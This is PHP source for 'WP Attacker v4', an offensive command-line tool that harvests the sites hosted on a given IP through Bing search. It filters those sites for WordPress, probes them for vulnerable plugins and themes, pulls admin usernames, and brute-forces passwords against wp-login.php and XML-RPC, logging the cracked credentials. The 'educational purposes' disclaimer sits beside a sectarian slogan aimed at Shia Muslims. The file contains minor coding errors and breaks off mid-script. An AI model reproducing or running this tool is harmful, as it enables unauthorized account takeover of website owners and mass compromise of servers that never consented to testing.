1
<?php
2
/*
3
    
4
    
5
              ██████╗ ██████╗  ██████╗ ██╗   ██╗██████╗     ██╗  ██╗██████╗ 
6
             ██╔════╝ ██╔══██╗██╔═══██╗██║   ██║██╔══██╗    ╚██╗██╔╝██╔══██╗
7
             ██║  ███╗██████╔╝██║   ██║██║   ██║██████╔╝     ╚███╔╝ ██████╔╝
8
             ██║   ██║██╔══██╗██║   ██║██║   ██║██╔═══╝      ██╔██╗ ██╔═══╝ 
9
             ╚██████╔╝██║  ██║╚██████╔╝╚██████╔╝██║         ██╔╝ ██╗██║     
10
              ╚═════╝ ╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝         ╚═╝  ╚═╝╚═╝ ALM3REFH.COM 
11
    
12
    
13
    ██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
14
    ██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
15
    ██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝
16
    ██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗
17
    ╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║
18
     ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ FORTH VERSION
19
    
20
    WP Attacker v4 © Group XP 2014
21
    
22
    Coder : Hannibal Ksa (@r00t3rz)
23
    Home  : alm3refh.com, sec4ever.com
24
    
25
    
26
    What's WP Attacker:
27
    - Scan the server's websites, and filter the ones that are using WorePress (Using Bing search engin [API]).
28
    - Get All the possible plugins and themese, which are vulnerable (Using a list). *UPDATED*
29
    - BruteForce each website that uses Wordpress (Using a correct username and a passwords list).
30
    - BruteForce each website that uses Wordpress (via XMLRPC's file using a correct username). *NEW*
31
    - Get All the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED*
32
    - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND*
33
    
34
    Why WP Attacker?
35
    - Using Bing API, Which leads to faster & guaranteed responde.
36
    - User can use his own 0day exploits.
37
    - BruteForce with two methods/ways.
38
    - List can be updated by the user.
39
    - Fast, simple and easy.
40
    
41
    # In a simple word, it is an "Automatic WP Exploiter".
42
    
43
    Disclaimer:
44
    - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
45
    - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.
46
    - USE IT UNDER YOUR OWN RISK!
47
    - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.
48
    
49
    Thanks and enjoy.
50
    
51
    And stay tuned!
52
    Best regards, Ali (aka Hannibal Ksa).
53
    
54
*/
55
error_reporting(0);
56
function clear(){
57
    ##########################
58
    ##   CLEAN THE SCREEN   ##
59
    ####################################################
60
    ##  FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS  ##
61
    ####################################################
62
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { #strtolower(PHP_SHLIB_SUFFIX) === 'dll'
63
        @system('cls'); # Windows
64
    } else { # DIRECTORY_SEPARATOR == '\\'
65
        @system('clear'); # Linux/UNIX/OS X
66
    }
67
}
68
function banner(){
69
    ##########################################################
70
    ##    BANNERS/COPYRIGHTS  R00T3RZ.COM & ALM3REFH.COM    ##
71
    ##   REMOVING THIS WILL ONLY MAKES YOU A "DOUCHEBAG!"   ##
72
    ##########################################################
73
    ####################
74
    ##  FIRST BANNER  ##
75
    ####################
76
    $bannerone = "\n\t  _      _____    ___ _______________  _______ _________";
77
    $bannerone .="\n\t | | /| / / _ \  / _ /_  __/_  __/ _ |/ ___/ //_/ __/ _ \\";
78
    $bannerone .="\n\t | |/ |/ / ___/ / __ |/ /   / / / __ / /__/ ,< / _// , _/";
79
    $bannerone .="\n\t |__/|__/_/    /_/ |_/_/   /_/ /_/ |_\___/_/|_/___/_/|_| \n";
80
    $bannerone .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
81
    #####################
82
    ##  SECOND BANNER  ##
83
    #####################
84
    $bannertwo = "\n\t           (                                              ";
85
    $bannertwo .="\n\t (  (      )\ )     (        )   )            )           ";
86
    $bannertwo .="\n\t )\))(   '(()/(     )\    ( /(( /(   )     ( /(   (  (    ";
87
    $bannertwo .="\n\t((_)()\ )  /(_)) ((((_)(  )\())\()| /(  (  )\()) ))\ )(   ";
88
    $bannertwo .="\n\t_(())\_)()(_))    )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\  ";
89
    $bannertwo .="\n\t\ \((_)/ /| _ \   (_)_\(_) |_| |_((_)_ ((_) |(_|_))  ((_) ";
90
    $bannertwo .="\n\t \ \/\/ / |  _/    / _ \ |  _|  _/ _` / _|| / // -_)| '_| ";
91
    $bannertwo .="\n\t  \_/\_/  |_|     /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_|   \n";
92
    $bannertwo .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
93
    ####################
94
    ##  THIRD BANNER  ##
95
    ####################
96
    $bannerthr = "\n\t _ _ _ _____    _____ _   _           _           ";
97
    $bannerthr .="\n\t| | | |  _  |  |  _  | |_| |_ ___ ___| |_ ___ ___ ";
98
    $bannerthr .="\n\t| | | |   __|  |     |  _|  _| .'|  _| '_| -_|  _|";
99
    $bannerthr .="\n\t|_____|__|     |__|__|_| |_| |__,|___|_,_|___|_|  \n";
100
    $bannerthr .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
101
    #####################
102
    ##  FOURTH BANNER  ##
103
    #####################
104
    $bannerfor = "\n\t _    _______    ___  _   _             _             ";
105
    $bannerfor .="\n\t| |  | | ___ \  / _ \| | | |           | |            ";
106
    $bannerfor .="\n\t| |  | | |_/ / / /_\ \ |_| |_ __ _  ___| | _____ _ __ ";
107
    $bannerfor .="\n\t| |/\| |  __/  |  _  | __| __/ _` |/ __| |/ / _ \ '__|";
108
    $bannerfor .="\n\t\  /\  / |     | | | | |_| || (_| | (__|   <  __/ |   ";
109
    $bannerfor .="\n\t \/  \/\_|     \_| |_/\__|\__\__,_|\___|_|\_\___|_|   \n";
110
    $bannerfor .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
111
    ####################
112
    ##  FIFTH BANNER  ##
113
    ####################
114
    $bannerfiv = "\n\t██╗    ██╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ ";
115
    $bannerfiv .="\n\t██║    ██║██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗";
116
    $bannerfiv .="\n\t██║ █╗ ██║██████╔╝    ███████║   ██║      ██║   ███████║██║     █████╔╝ █████╗  ██████╔╝";
117
    $bannerfiv .="\n\t██║███╗██║██╔═══╝     ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗ ██╔══╝  ██╔══██╗";
118
    $bannerfiv .="\n\t╚███╔███╔╝██║         ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗███████╗██║  ██║";
119
    $bannerfiv .="\n\t ╚══╝╚══╝ ╚═╝         ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝\n\n";
120
    $bannerfiv .="\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
121
    #########################################
122
    ##   GET A RANDOME BANNER & PRINT IT   ##
123
    ##         METASPLOIT SWAG :-P         ##
124
    #########################################
125
    $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv);
126
    print $banner[array_rand($banner)];
127
}
128
function noblackhat(){
129
    ##################
130
    ##  DISCLAIMER  ##
131
    ##################
132
    print "\n\t ______________________________________________";
133
    print "\n\t|    ____                        __  ______    |";
134
    print "\n\t|   / ___|_ __ ___  _   _ _ __   \ \/ /  _ \   |";
135
    print "\n\t|  | |  _| '__/ _ \| | | | '_ \   \  /| |_) |  |";
136
    print "\n\t|  | |_| | | | (_) | |_| | |_) |  /  \|  __/   |";
137
    print "\n\t|   \____|_|  \___/ \__,_| .__/  /_/\_\_|      |";
138
    print "\n\t|                        |_|ALM3REFH.com       |";
139
    print "\n\t|                                              |";
140
    print "\n\t+----------------------------------------------+";
141
    print "\n\t|       WP Attacker v4 - By Hannibal Ksa       |";
142
    print "\n\t+----------------------------------------------+\n\n";
143
    print "\n\t\t    !! NO SHIA / ONLY SUNNAH !!\n\n";
144
    ###########################
145
    ##  5 SECONDS DISCLAIMER ##
146
    ###########################
147
    print "\n\n\tThis tool may be used for legal purposes only.  Users take full
148
\tresponsibility for any actions performed using this tool.            
149
\tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY!                             
150
\tIf these terms are not acceptable to you, then do not use this tool.
151
\n\tPlease Read! Continuing in 5 seconds ";
152
    sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". ";
153
    print "\n\n\n\n";
154
}
155
function bing_it($hk){
156
    ##################
157
    ##   BING API   ##
158
    ###########################################################################
159
    ##   REPLACE [ $account_key ] VALUE WITH YOUR [ BING API ACCOUNT KEY ]   ##
160
    ##  MORE INFO [ https://datamarket.azure.com/dataset/bing/search ]       ##
161
    ###########################################################################
162
    $account_key = 'ACCOUNT_KEY_GOES_HERE';
163
    $query = $hk;
164
    $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json";
165
    $ch = curl_init();
166
    curl_setopt($ch, CURLOPT_URL, $url);
167
    curl_setopt($ch, CURLOPT_HEADER, false);
168
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
169
    curl_setopt($ch, CURLOPT_FRESH_CONNECT,true);
170
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
171
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
172
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
173
    curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key);
174
    $json = curl_exec($ch);
175
    curl_close($ch);
176
    $data = json_decode($json);
177
    foreach ($data->d->results as $value) {
178
        $file = fopen("sites.txt","a+");
179
        fwrite($file,"{$value->DisplayUrl}\n");
180
        fclose($file);
181
    }
182
}
183
function wp($list){
184
    ########################################
185
    ##   CHECK IF IS BUILT ON WORDPRESS   ##
186
    ########################################
187
    $file = file_get_contents($list);
188
    $get = explode('\n', $file);
189
    foreach($get as $site){
190
        $ch = curl_init();
191
        curl_setopt($ch, CURLOPT_URL, $site);
192
        curl_setopt($ch, CURLOPT_HEADER, 0);
193
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
194
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
195
        $result = curl_exec($ch);
196
        curl_exec($ch);
197
        curl_close($ch);
198
        if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
199
            $filename = 'wp-sites.txt';
200
            $fp = fopen($filename, "a+");
201
            $write = fputs($fp, $site."\n");
202
            fclose($fp);
203
        }
204
    }
205
    $lines = file('wp-sites.txt');
206
    $lines = array_unique($lines);
207
    file_put_contents('wp-sites.txt', implode($lines));
208
}
209
function wp_em($list){
210
    ###############################
211
    ##   MAKE'EM CRYSTAL CLEAR   ##
212
    ###############################
213
    $file = file_get_contents($list);
214
    $get = explode("\n", $file);
215
    foreach($get as $wpsite){
216
        $ch = curl_init();
217
        curl_setopt($ch, CURLOPT_URL, $wpsite);
218
        curl_setopt($ch, CURLOPT_HEADER, 0);
219
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
220
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
221
        $result = curl_exec($ch);
222
        curl_exec($ch);
223
        curl_close($ch);
224
        preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url);
225
        $wpurl = str_replace("xmlrpc.php","",$url[1]);
226
        $filename = 'wp.txt';
227
        $fp = fopen($filename, "a+");
228
        $write = fputs($fp, $wpurl."\n");
229
        fclose($fp);
230
    }
231
    $lines = file('wp.txt');
232
    $lines = array_unique($lines);
233
    file_put_contents('wp.txt', implode($lines));
234
}
235
function xp_scanner($target, $list, $key = NULL){
236
    ##########################################################
237
    ##   PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION  ##
238
    ##########################################################
239
    ##  LIST FORMAT:  NAME:PATH:KEYWORD                     ##
240
    ##  EXAMPLE:  xp:wp-content/plugins/xp/xp.php:Group-XP  ##
241
    ##########################################################
242
    ##  NAME IS REQUIRED (*)                                ##
243
    ##  PATH IS REQUIRED (*)                                ##
244
    ##  KEYWORD IS OPTIONAL (?)                             ##
245
    ##########################################################
246
    $file = file_get_contents($list);
247
    $plugins = explode("\n", $file);
248
    #print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
249
    if($key == NULL){
250
        foreach($plugins as $plugin){
251
            #####################
252
            ##   GET HEADERS   ##
253
            #####################
254
            $x = explode(":", $plugin);
255
            $target = $target.'/'.$x[1];
256
            $check = @get_headers($target);
257
            if(eregi("200",$check[0])){
258
                ####################
259
                ##  PLUGIN FOUND  ##
260
                ####################
261
                print "\n\t[!] FOUND $x[0] -> $target";
262
                /*
263
                #############
264
                ## SAVE IT ##
265
                #############
266
                $data = $target." -> ".$x[0]."\n";
267
                $filename = 'vuln.txt';
268
                $fp = fopen($filename, "a+");
269
                $write = fputs($fp, $data);
270
                fclose($fp);
271
                */
272
            }#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
273
        }
274
    }else{
275
        foreach($plugins as $plugin){
276
            #####################
277
            ##   GET KEYWORD   ##
278
            #####################
279
            $x = explode(":", $plugin);
280
            $ch = curl_init();
281
            curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
282
            curl_setopt($ch, CURLOPT_HEADER, 0);
283
            curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
284
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
285
            $result = curl_exec($ch);
286
            curl_exec($ch);
287
            curl_close($ch); 
288
            if(preg_match("#".$x[2]."#", $result)){
289
                ####################
290
                ##  PLUGIN FOUND  ##
291
                ####################
292
                print "\n\t[!] FOUND $x[0] -> $target";
293
                /*
294
                #############
295
                ## SAVE IT ##
296
                #############
297
                $data = $target." -> ".$x[0]."\n";
298
                $filename = 'vuln.txt';
299
                $fp = fopen($filename, "a+");
300
                $write = fputs($fp, $data);
301
                fclose($fp);
302
                */
303
            } #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
304
        }
305
    }
306
}
307
function xp_get_plugins($target){
308
    #########################
309
    ##   GET ALL PLUGINS   ##
310
    #########################
311
    $ch = curl_init();
312
    curl_setopt($ch, CURLOPT_URL, $target);
313
    curl_setopt($ch, CURLOPT_HEADER, 0);
314
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
315
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
316
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
317
    $result = curl_exec($ch);
318
    curl_exec($ch);
319
    curl_close($ch);
320
    preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
321
    $plugins = array_unique($plugin[1]);
322
    #if(count($plugins)==0){
323
    #    print "No Plugin was found.";
324
    #}
325
    foreach($plugins as $found){
326
        #print "\n\n$found\n\n";
327
        #################
328
        ##  SEARCH IT  ##
329
        #################
330
        xp_scanner_db($target, $found);
331
    }
332
}
333
function xp_get_themes($target){
334
    #########################
335
    ##   GET ALL PLUGINS   ##
336
    #########################
337
    $ch = curl_init();
338
    curl_setopt($ch, CURLOPT_URL, $target);
339
    curl_setopt($ch, CURLOPT_HEADER, 0);
340
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
341
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
342
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
343
    $result = curl_exec($ch);
344
    curl_exec($ch);
345
    curl_close($ch);
346
    preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
347
    $themes = array_unique($theme[1]);
348
    #if(count($plugins)==0){
349
    #    print "No Plugin was found.";
350
    #}
351
    foreach($themes as $found){
352
        #print "\n\n$found\n\n";
353
        #################
354
        ##  SEARCH IT  ##
355
        #################
356
        xp_scanner_db($target, $found);
357
    }
358
}
359
function xp_scanner_db($target, $plugin){
360
    #######################################################################
361
    ##   PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION  ##
362
    #######################################################################
363
    ##  THIS VERSION ONLY CHECKS  ##
364
    ## - WORDPRESSEXPLOIT.COM     ##
365
    ## - EXPLOIT-DB.COM           ##
366
    ################################
367
    $wpexploit = array("http://www.wordpressexploit.com/", );
368
    $ch = curl_init();
369
    curl_setopt($ch, CURLOPT_URL, $wpexploit);
370
    curl_setopt($ch, CURLOPT_HEADER, 0);
371
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
372
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
373
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
374
    $result = curl_exec($ch);
375
    curl_exec($ch);
376
    curl_close($ch);
377
    if(preg_match("#$plugin#", $result)){
378
        ##############
379
        ##  GOTCHA  ##
380
        ##############
381
        //print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n";
382
        ###############
383
        ##  SAVE IT  ##
384
        ###############
385
        $data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
386
        $filename = 'vulpl.txt';
387
        $fp = fopen($filename, "a+");
388
        $write = fputs($fp, $data."\n");
389
        fclose($fp);
390
    }
391
}
392
function xp_get_user($target,$list, $xmlrpc = NULL){
393
    ####################################
394
    ##     GET WORDPRESS USERNAME     ##
395
    ##  A SIMPLE ONE BUT WOTH A SHOT  ##
396
    ####################################
397
    $user = trim(($target))."/?author=1";
398
    $ch = curl_init();
399
    curl_setopt($ch, CURLOPT_URL, $user);
400
    curl_setopt($ch, CURLOPT_HEADER, 0);
401
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
402
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
403
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
404
    $result = curl_exec($ch);
405
    curl_exec($ch);
406
    curl_close($ch);
407
    preg_match('#<title>(.*?)</title>#', $result, $username);
408
    $account = explode('|', $username[1]);
409
    if($xmlrpc == NULL){
410
        ###########################################################
411
        ##  START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
412
        ###########################################################
413
        return xp_brute($target,$account[0],$list);
414
    }else {
415
        ###########################################################
416
        ##  START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT  ##
417
        ###########################################################
418
        return xp_brute_xmlrpc($target,$account[0],$list);
419
    }
420
}
421
function xp_brute($target,$user,$list){
422
    ###########################################
423
    ##   BRUTE FORCE PULBLIC/FIRST VERSION   ##
424
    ###########################################
425
    ##  PASSWORDS LIST FORMAT:  PASSWORD\n   ##
426
    ##  EXAMPLE:  12345\np4ssw0rd            ##
427
    ##  ( \n = NEW LINE )                    ##
428
    ###########################################
429
    $file = file_get_contents($list);
430
    $passwords = explode("\n", $file);
431
    $target = trim($target);
432
    $user = trim($user);
433
    print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
434
    foreach($passwords as $password){
435
        #############################
436
        ##  TESTING EACH PASSWORD  ##
437
        #############################
438
        $redirect = $taregt."/wp-admin/";
439
        $curl = curl_init();
440
        curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
441
        curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
442
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
443
        curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
444
        curl_setopt($curl,CURLOPT_TIMEOUT,10);
445
        curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
446
        curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
447
        curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
448
        $urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
449
        curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
450
        $result = curl_exec($curl);
451
        curl_close($curl);
452
        ##########################
453
        ##  CHECK IF IT WORKED  ##
454
        ##########################
455
        if(strstr($result, 'tab-panel-overview')){
456
            print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
457
            ###############
458
            ##  SAVE IT  ##
459
            ###############
460
            $data = "\n[!] Cracked $target -> [ $user:$password ]";
461
            $filename = 'cracked.txt';
462
            $fp = fopen($filename, "a+");
463
            $write = fputs($fp, $data."\n");
464
            fclose($fp);
465
            break;
466
        }#else{ print "\n[+] Trying $user:$password"; }
467
    }
468
}
469
function xp_check_xmlrpc($target){
470
    $target = $target."/xmlrpc.php";
471
    $check = @get_headers($target);
472
    if(eregi("200",$check[0])){
473
        return 1;
474
    }else{
475
        return 0;
476
    }
477
}
478
function xp_brute_xmlrpc($target,$user,$list){
479
    ######################################################
480
    ##   BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION   ##
481
    ######################################################
482
    ##  PASSWORDS LIST FORMAT:  PASSWORD\n              ##
483
    ##  EXAMPLE:  12345\np4ssw0rd                       ##
484
    ##  ( \n = NEW LINE )                               ##
485
    ######################################################
486
    $target = trim($target);
487
    $user = trim($user);
488
    if(xp_check_xmlrpc($target) != 1){
489
        print "\n[!] Couldn't find xmlrpc.php in $target\n";
490
        break;
491
    }else{
492
        $file = file_get_contents($list);
493
        $passwords = explode("\n", $file);
494
        print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
495
        foreach($passwords as $password){
496
            $password = trim($password);
497
            $headers = array('Content-Type: application/x-www-form-urlencoded');
498
            $isadmin = '<name>isAdmin</name>';
499
            #############################
500
            ##  TESTING EACH PASSWORD  ##
501
            #############################
502
            $data = "
503
            <methodCall>
504
                <methodName>wp.getUsersBlogs</methodName>
505
                <params>
506
                <param><value><string>$user</string></value></param>
507
                <param><value><string>$password</string></value></param>
508
            </params></methodCall>
509
            ";
510
            $curl = curl_init();
511
            curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
512
            curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
513
            curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
514
            curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
515
            curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
516
            curl_setopt($curl,CURLOPT_TIMEOUT,10);
517
            curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
518
            curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
519
            curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
520
            curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
521
            $result = curl_exec($curl);
522
            curl_close($curl);
523
            ##########################
524
            ##  CHECK IF IT WORKED  ##
525
            ##########################
526
            if(strstr($result, $isadmin)){
527
                print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
528
                ###############
529
                ##  SAVE IT  ##
530
                ###############
531
                $data = "\n[!] Cracked $target -> [ $user:$password ]";
532
                $filename = 'cracked.txt';
533
                $fp = fopen($filename, "a+");
534
                $write = fputs($fp, $data."\n");
535
                fclose($fp);
536
                break;
537
            }#else{ print "\n[+] Trying $user:$password"; }
538
        }
539
    }
540
}
541
function bye(){
542
    ########################
543
    ##  DONE/SAY GOODBYE  ##
544
    ########################
545
    print "\n\n[+] DONE!\n[-] EXITING.\n\n";
546
    ######################
547
    ## DELETE LOG FILES ##
548
    ###################################################################
549
    ## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
550
    ###################################################################
551
    unlink('sites.txt');
552
    unlink('wp-sites.txt');
553
    unlink('wp.txt');
554
    unlink('vuln.txt');
555
    unlink('cracked.txt');
556
    exit(2);
557
}
558
############################
559
##  COMMAND LINE'S  SHIT  ##
560
############################
561
clear();
562
noblackhat();
563
################################################
564
##  MAKE SURE IT RUNS ONLY FROM COMMAND LINE  ##
565
################################################
566
if( strtolower(php_sapi_name()) != 'cli' ) {
567
    printf("%s\n", "Please run only from command line interface.");
568
    exit;
569
}
570
clear();
571
banner();
572
print "\nIP-Address # ";
573
$target = trim(fgets(STDIN));
574
// if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
575
##############################
576
##   DELETE OLD LOG FILES   ##
577
##############################
578
unlink('sites.txt');
579
unlink('wp-sites.txt');
580
unlink('wp.txt');
581
unlink('vuln.txt');
582
unlink('cracked.txt');
583
unlink('vulpl.txt');
584
#############################
585
##   CREAT THE LOG FILES   ##
586
#############################
587
$log1 = fopen("sites.txt","w");fclose($log1);
588
$log2 = fopen("wp-sites.txt","w");fclose($log2);
589
$log3 = fopen("wp.txt","w");fclose($log3);
590
$log4 = fopen("vuln.txt","w");fclose($log4);
591
$log4 = fopen("cracked.txt","w");fclose($log4);
592
$log5 = fopen("vulpl.txt","w");fclose($log5);
593
###############################
594
##  SHIT IS GETTIN' REAL =P  ##
595
###############################
596
print "\nDORK [or simply leave it empty] # ";
597
$dork = trim(fgets(STDIN));
598
print "\n[+] Getting the server's sites";
599
if($dork == ""){
600
    #########################
601
    ##  IF DORK WAS EMPTY  ##
602
    #########################
603
    bing_it("ip:$target");
604
    bing_it("ip:".$target." /page_id=");
605
    bing_it("ip:".$target." Wordpress");
606
    bing_it("ip:".$target." blog");
607
}else{
608
    ###########################
609
    ##  USE THE USER'S DORK  ##
610
    ###########################
611
    bing_it("ip:".$target." ".$dork);
612
}
613
#print "\n[-] Got'em";sleep(1);
614
print "\n[+] Separating the sites";
615
wp('sites.txt');
616
#print "\n[-] We got the sites, which are using WordPress";sleep(1);
617
wp_em('wp-sites.txt');
618
#################
619
##   Results   ##
620
#################
621
print "\n[+] Finished, these are the website/s that I found:\n";
622
$wplist = file_get_contents('wp.txt');
623
$get = explode("\n", $wplist);
624
#print "[ ".count($get)." Website ]\n"; // empty lines will be counted
625
foreach($get as $hk){
626
    if(!$hk==""){
627
        print "\n\t[!] $hk";
628
    }
629
}
630
###########################
631
##   GIVE ME AN OPTION   ##
632
###########################
633
print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
634
print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
635
$what = trim(fgets(STDIN));
636
$choice = array("1","2","3","4");
637
$yesno = array("y","yes");
638
if(in_array($what, $choice)){
639
    if($what == "1"){
640
        print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
641
        $list = trim(fgets(STDIN));
642
        if(!is_file($list)) {
643
            #######################
644
            ##  CAN'T LOAD LIST  ##
645
            #######################
646
            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
647
            ##############
648
            ##   EXIT   ##
649
            ##############
650
            bye();
651
        }
652
        #################
653
        ##   POOYAA!   ##
654
        #################
655
        print "\n[+] Scanning begun";
656
        $file = file_get_contents($list);
657
        $plugins = explode("\n", $file);
658
        print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
659
        $targets = file_get_contents('wp.txt');
660
        $r00t3rz = explode("\n", $targets);
661
        print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
662
        $key = strtolower(trim(fgets(STDIN)));
663
        if(in_array($key, $yesno)){
664
            $key = "set";
665
        }else{
666
            $key = NULL;
667
        }
668
        foreach($r00t3rz as $z){
669
            if(!$z == ""){
670
                xp_scanner($z, $list, $key);
671
            }
672
        }
673
        /*
674
        #################
675
        ##   Results   ##
676
        #################
677
        print "\n[+] Scanning finished!";
678
        $vul = file_get_contents('vuln.txt');
679
        $able = explode("\n", $vul);
680
        print '[ '.count($able).' Website ]\n';
681
        foreach($able as $gxp){
682
            if(!$gxp==""){
683
                print "\n\t[!] $gxp";
684
            }
685
        }
686
        */
687
        bye();
688
    } elseif($what == "2") {
689
        print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
690
        #################
691
        ##   POOYAA!   ##
692
        #################
693
        print "\n[+] Scanning begun";
694
        $targets = file_get_contents('wp.txt');
695
